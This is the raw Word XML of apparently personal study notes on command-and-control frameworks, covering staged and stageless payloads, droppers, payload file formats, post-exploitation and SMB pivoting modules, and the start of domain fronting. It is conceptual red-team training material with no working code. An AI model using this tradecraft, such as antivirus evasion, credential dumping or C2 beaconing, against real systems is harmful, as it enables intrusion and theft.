    <w:p w:rsidR="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00622C41" w:rsidRDefault="00622C41" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Payload Types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Much like a regular Reverse Shell, there are two primary types of payloads that you may be able to use in your C2 Framework;</w:t>
      </w:r>
      <w:r w:rsidR="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Staged and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Stageless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00622C41" w:rsidRDefault="00622C41" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Stageless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Stageless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payloads are the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>simplest</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the two; they contain the full C2 agent and will call back to the C2 server and begin beaconing immediately. You can refer to the diagram below to gain a better understanding of </w:t>
      </w:r>
      <w:r w:rsidR="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">how </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Stageless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads operate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00483DB7" w:rsidRPr="00BA64BB" w:rsidRDefault="00483DB7" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00483DB7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5648325" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="C:\Users\shefali\Pictures\THM\2.2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fali\Pictures\THM\2.2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1752600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">This screenshot depicts a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>stageless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload calling back to a C2 server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00622C41" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The steps for establishing C2 beaconing with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>St</w:t>
      </w:r>
      <w:r w:rsidR="00622C41" w:rsidRPr="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>ageless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00622C41" w:rsidRPr="00622C41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> payload are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1. The Victim downloads and executes the Dropper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2. The beaconing to the C2 Server begins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00622C41" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="004E610B" w:rsidRDefault="004E610B" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Staged Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Staged payloads require a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the C2 server to download additional parts of the C2 agent. This is commonly referred to as a “Dropper” because it is “Dropped” onto the victim machine to download the second stage of our staged payload. This is a preferred method over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>stageless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads because a small amount of code needs to be written to retrieve the additional parts of the C2 agent from the C2 server. It also makes it easier to obfuscate code to bypass Anti-Virus programs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00483DB7" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00483DB7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2679756"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="5" name="Picture 5" descr="C:\Users\shefali\Pictures\THM\2.3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fali\Pictures\THM\2.3c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9756"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>This diagram depicts a dropper calling back to a C2 server for its second stage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>The steps for establishing C2 beaconing with a</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Staged payload are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1. The Victim downloads and executes the Dropper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2. The Dropper calls back to the C2 Server for Stage 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3. The C2 Server sends Stage 2 back to the Victim Workstation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Stage 2 is loaded into memory on the Victim Workstation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA64BB" w:rsidRPr="00BA64BB" w:rsidRDefault="00BA64BB" w:rsidP="00BA64BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA64BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5. C2 Beaconing Initializes, and the Red Teamer/Threat Actors can engage with the Victim on the C2 Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00433E80" w:rsidRDefault="00433E80" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0002746E" w:rsidRPr="0002746E" w:rsidRDefault="0002746E" w:rsidP="0002746E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0002746E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Payload Formats</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002746E" w:rsidRPr="0002746E" w:rsidRDefault="0002746E" w:rsidP="0002746E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0002746E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>As you may know, Windows PE files (Executables) are not the only way to execute code on a system. Some C2 Frameworks support payloads in vari</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ous other formats, for example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002746E" w:rsidRPr="0002746E" w:rsidRDefault="0002746E" w:rsidP="0002746E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0002746E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    PowerShell Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002746E" w:rsidRPr="0002746E" w:rsidRDefault="0002746E" w:rsidP="0002746E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0002746E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        Which may contain C# Code and may be compiled and executed with the Add-Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0002746E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>commandlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0002746E" w:rsidRPr="0002746E" w:rsidRDefault="0002746E" w:rsidP="0002746E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0002746E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    HTA Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002746E" w:rsidRPr="0002746E" w:rsidRDefault="0002746E" w:rsidP="0002746E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0002746E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    JScript Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002746E" w:rsidRPr="0002746E" w:rsidRDefault="0002746E" w:rsidP="0002746E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0002746E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Visual Basic Application/Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00127260" w:rsidRPr="001253A2" w:rsidRDefault="0002746E" w:rsidP="0002746E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0002746E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    Microsoft Office Documents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="00FB000F" w:rsidRDefault="001253A2" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="00FB000F" w:rsidRDefault="00FB000F" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB000F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="003079D7" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003079D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Modules are a core component of any C2 Framework; they add the ability to make agents and the C2 server more flexible. Depending on the C2 Framework, scripts must be written in different languages. Cobalt Strike has “Aggressor Scripts”, which are written in the “Aggressor Scripting Language”. PowerShell Empire has support for multiple languages, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003079D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003079D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modules are written in Ruby, and many others are written in many other languages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="00FB000F" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB000F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Post Exploitation Modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="003079D7" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003079D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Post Exploitation modules are simply modules that deal with anything after the initial point of compromise, this could be as simple as running SharpHound.ps1 to find paths of lateral movement, or it could be as complex as dumping LSASS and parsing credentials in memory. For more information on Post Exploitation, refer to the Post Exploitation Basics room.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="00741DFA" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00741DFA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Pivoting Modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="003079D7" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003079D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>One of the last major components of a C2 Framework is its pivoting modules, making it easier to access restricted network segments within the C2 Framework. If you have Administrative Access on a system, you may be able to open up an “SMB Beacon”, which can enable a machine to act as a proxy via the SMB protocol. This may allow machines in a restricted network segment to communicate with your C2 server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="003079D7" w:rsidRDefault="00F9760C" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9760C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="3033192"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="C:\Users\shefali\Pictures\THM\2.4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fali\Pictures\THM\2.4c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3192"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="003079D7" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003079D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>This diagram depicts multiple victims with an SMB pivot calling back to a C2 server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="003079D7" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003079D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The diagram above shows how hosts within a restricted network segment call back to the C2 Server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="003079D7" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="003079D7" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003079D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. The Victims call back to an SMB named pipe on another Victim in a non-restricted network segment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="003079D7" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003079D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2. The Victim in the non-restricted network segment calls back to the C2 Server over a standard beacon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="003079D7" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003079D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3. The C2 Server then sends commands back to the Victim in the non-restricted network segment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003079D7" w:rsidRPr="003079D7" w:rsidRDefault="003079D7" w:rsidP="003079D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003079D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4. The Victim in the non-restricted network segment then forwards the C2 instructions to the hosts in the restricted segment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C35805" w:rsidRDefault="00C35805" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="00C35805" w:rsidRDefault="00C35805" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35805">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Facing the world </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="007023DE" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007023DE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>One important obstacle that all Red Teamers must overcome is placing infrastructure in plain view. There are many different methods to do this; one of the most popular methods is called "Domain Fronting".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007023DE" w:rsidRPr="00C35805" w:rsidRDefault="007023DE" w:rsidP="007023DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35805">
        <w:rPr>
